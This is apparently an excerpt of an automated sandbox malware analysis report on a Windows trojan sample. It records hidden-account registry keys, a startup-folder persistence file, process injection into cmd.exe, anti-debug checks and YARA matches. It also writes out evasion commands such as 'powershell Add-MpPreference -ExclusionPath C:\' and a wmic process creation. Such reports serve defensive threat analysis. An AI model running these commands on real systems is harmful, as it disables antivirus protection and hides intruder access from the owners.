          Source: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe, 00000000.00000002.265319225.0000000002310000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
          Source: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe, 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp | String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
          Source: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe, 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
          Source: images.exe, 00000004.00000002.522785265.00000000022E0000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
          Source: images.exe, 00000004.00000002.522785265.00000000022E0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
          Source: images.exe, 00000004.00000002.523109048.0000000002CF4000.00000002.00001000.00020000.00000000.sdmp | String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
          Source: images.exe, 00000004.00000002.523109048.0000000002CF4000.00000002.00001000.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
          Source: C:\ProgramData\images.exe | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList GEAzbtF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.bat:start
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Check user administrative privileges: IsUserAndAdmin, DecisionNode graph_0-21073
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec) graph_0-21650
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe TID: 6364 | Thread sleep count: 59 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6688 | Thread sleep time: -10145709240540247s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6672 | Thread sleep time: -922337203685477s >= -30000s
          Source: C:\ProgramData\images.exe TID: 6520 | Thread sleep count: 94 > 30
          Source: C:\ProgramData\images.exe TID: 6520 | Thread sleep time: -75200s >= -30000s
          Source: C:\ProgramData\images.exe TID: 6704 | Thread sleep count: 59 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6380 | Thread sleep time: -14757395258967632s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2492 | Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\cmd.exe TID: 7112 | Thread sleep count: 853 > 30
          Source: C:\Windows\SysWOW64\cmd.exe TID: 7112 | Thread sleep time: -10236000s >= -30000s
          Source: C:\Windows\SysWOW64\cmd.exe | Last function: Thread delayed
          Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: OpenSCManagerW,EnumServicesStatusExW,EnumServicesStatusExW,GetLastError,CloseServiceHandle,OpenSCManagerW,lstrcmpW,0_2_02D1DA5B
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4887
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1233
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4936
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 702
          Source: C:\Windows\SysWOW64\cmd.exe | Window / User API: threadDelayed 853
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes graph_0-20874
          Source: C:\ProgramData\images.exe | Dropped PE file which has not been started: C:\Program Files\Microsoft DN1\sqlmap.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exe | File opened / queried: scsi#disk&ven_vmware&prod_virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Windows\System32\wbem\WmiPrvSE.exe | File opened: PHYSICALDRIVE0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_02D2002B GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetDriveTypeW,0_2_02D2002B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | API call chain: ExitProcess graph end node graph_0-21246
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | API call chain: ExitProcess graph end node graph_0-19712
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | API call chain: ExitProcess graph end node graph_0-21068
          Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\AppData\Roaming\
          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Jump to behavior
          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\Jump to behavior
          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
          Source: powershell.exe, 00000001.00000003.378873631.0000000004BFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V
          Source: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe, 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmp, images.exe, 00000004.00000002.520447296.000000000054A000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: .?AVCRegistryVirtualMachine@ATL@@
          Source: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe, 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmp, images.exe, 00000004.00000002.520447296.000000000054A000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: A.?AVCRegistryVirtualMachine@ATL@@l
          Source: powershell.exe, 00000001.00000003.378873631.0000000004BFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_0040AAE3 VirtualQuery,GetSystemInfo,VirtualAlloc,VirtualProtect,0_2_0040AAE3
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_0040FD34 FindFirstFileExA,0_2_0040FD34
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_0040FE55 FindFirstFileExA,FindClose,0_2_0040FE55
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_02D1FF27 FindFirstFileW,FindNextFileW,0_2_02D1FF27
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_02D19DF6 GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA,0_2_02D19DF6
          Source: C:\Windows\System32\drivers\tsusbhub.sysSystem information queried: ModuleInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_00553B50 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,0_2_00553B50
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_0040FB09 mov eax, dword ptr fs:[00000030h]0_2_0040FB09
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_0040C40E mov eax, dword ptr fs:[00000030h]0_2_0040C40E
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_02D2094E mov eax, dword ptr fs:[00000030h]0_2_02D2094E
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_02D20619 mov eax, dword ptr fs:[00000030h]0_2_02D20619
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_02D20620 mov eax, dword ptr fs:[00000030h]0_2_02D20620
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_0326001A mov eax, dword ptr fs:[00000030h]8_2_0326001A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_00407269 IsDebuggerPresent,OutputDebugStringW,0_2_00407269
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_0040AAE3 VirtualProtect ?,-00000001,00000104,?,?,?,0000001C0_2_0040AAE3
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_00410931 GetProcessHeap,0_2_00410931
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\ProgramData\images.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_00407F52 SetUnhandledExceptionFilter,0_2_00407F52
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_004079AA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_004079AA
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_00407DBF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00407DBF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_0040A7A3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040A7A3

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\ProgramData\images.exe | Memory allocated: C:\Windows\SysWOW64\cmd.exe base: 3260000 protect: page execute and read and write
          Source: C:\ProgramData\images.exe | Memory allocated: C:\Windows\SysWOW64\cmd.exe base: 3280000 protect: page read and write
          Source: C:\ProgramData\images.exe | Thread created: C:\Windows\SysWOW64\cmd.exe EIP: 326010E
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
          Source: C:\ProgramData\images.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
          Source: C:\ProgramData\images.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 3260000
          Source: C:\ProgramData\images.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 3280000
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_02D179E8 OpenProcess,VirtualAllocEx,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread, 0_2_02D179E8
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_02D21FD8 RegSetValueExA,OpenProcess,GetCurrentProcessId,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread, 0_2_02D21FD8
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: RegSetValueExA,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, explorer.exe 0_2_02D220B8
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic process call create '"C:\ProgramData:ApplicationData"'
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_02D1F56D AllocateAndInitializeSid,LookupAccountSidW,GetLastError,FreeSid, 0_2_02D1F56D
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_02D218BA InitializeSecurityDescriptor,SetSecurityDescriptorDacl,RegCreateKeyExA,RegCloseKey,SetLastError, 0_2_02D218BA
          Source: images.exe, 00000004.00000002.524034966.00000000043EE000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.524593557.00000000047F0000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: GetProgmanWindow
          Source: images.exe, 00000004.00000002.524034966.00000000043EE000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.524593557.00000000047F0000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: SetProgmanWindow
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_00408024 cpuid 0_2_00408024
          Source: C:\ProgramData\images.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_0040826B GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_0040826B
          Source: C:\ProgramData\images.exe | Code function: 4_3_02F494E0 GetVersionExW,MultiByteToWideChar,MultiByteToWideChar,_malloc,MultiByteToWideChar,_free,GetVersionExW,GetDiskFreeSpaceW,GetDiskFreeSpaceA,_free, 4_3_02F494E0

          Lowering of HIPS / PFW / Operating System Security Settings

          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Registry key created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings MaxConnectionsPerServer 10

          Stealing of Sensitive Information

          Source: Yara match | File source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.2d10000.3.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.images.exe.22e053f.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.images.exe.22e053f.3.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.3.images.exe.720700.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.3.images.exe.720700.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.images.exe.2ce0000.4.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.721d18.7.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000004.00000003.271102181.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000003.252637221.0000000000721000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.265319225.0000000002310000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
